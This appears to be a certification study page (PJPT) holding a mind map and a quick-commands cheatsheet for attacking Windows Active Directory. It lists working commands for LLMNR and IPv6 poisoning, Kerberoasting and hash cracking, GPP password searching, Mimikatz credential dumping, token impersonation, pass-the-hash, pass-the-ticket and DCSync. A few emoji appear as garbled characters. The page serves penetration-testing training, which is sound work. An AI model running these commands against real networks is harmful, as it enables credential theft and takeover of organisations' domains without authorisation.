Techniques Mind Map
mindmap
root((PJPT))
Initial Access
LLMNR Poisoning
responder -I eth0
IPv6 Attacks
mitm6 -d domain
SMB Relay
ntlmrelayx.py
Password Spraying
crackmapexec smb
Quick Wins
Kerberoastingβ
GetUserSPNs.py
hashcat -m 13100
GPP Passwords
Get-GPPPassword
Token Impersonation
load incognito
BloodHound
SharpHound.exe
Credential Dumping
Mimikatz
sekurlsa::logonpasswords
lsadump::sam
NTDS.dit
secretsdump.py
ntdsutil
Lateral Movement
Pass-the-Hash
psexec.py -hashes
evil-winrm -H
Pass-the-Ticket
getTGT.py
kerberos::ptt
RDP/WinRM
xfreerdp
Enter-PSSession
Domain Admin
DCSync
lsadump::dcsync
Golden Ticket
kerberos::golden
Persistence
Backdoor accounts
Scheduled tasksQuick Commands Cheatsheet
π Start Here
# Terminal 1 - LLMNR
sudo responder -I eth0 -wrf
# Terminal 2 - IPv6
sudo mitm6 -d domain.local
# Terminal 3 - Check targets
crackmapexec smb 10.0.0.0/24π― Must Do After Credentials
# Kerberoasting (ALWAYS!)
GetUserSPNs.py domain/user:pass -request -dc-ip DC_IP
# BloodHound collection
bloodhound-python -d domain -u user -p pass -c all
# Check for GPP
Get-GPPPassword
findstr /S cpassword \\dc\sysvol\*.xmlπ After Local Admin
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
# Token impersonation
load incognito
list_tokens -u
impersonate_token DOMAIN\\Administratorπ₯ Lateral Movement
# Pass-the-Hash
psexec.py -hashes :NTLM domain/administrator@target
# Pass-the-Ticket
getTGT.py domain/user:pass
export KRB5CCNAME=user.ccache
psexec.py -k -no-pass domain/administrator@targetLinks to Detailed Guides
Technique
File
Description
Mimikatz
mimikatz-overview.md
Credential dumping
π‘ Pro Tip: Start with passive attacks (responder/mitm6) and ALWAYS try Kerberoasting after getting any valid credentials!
Last updated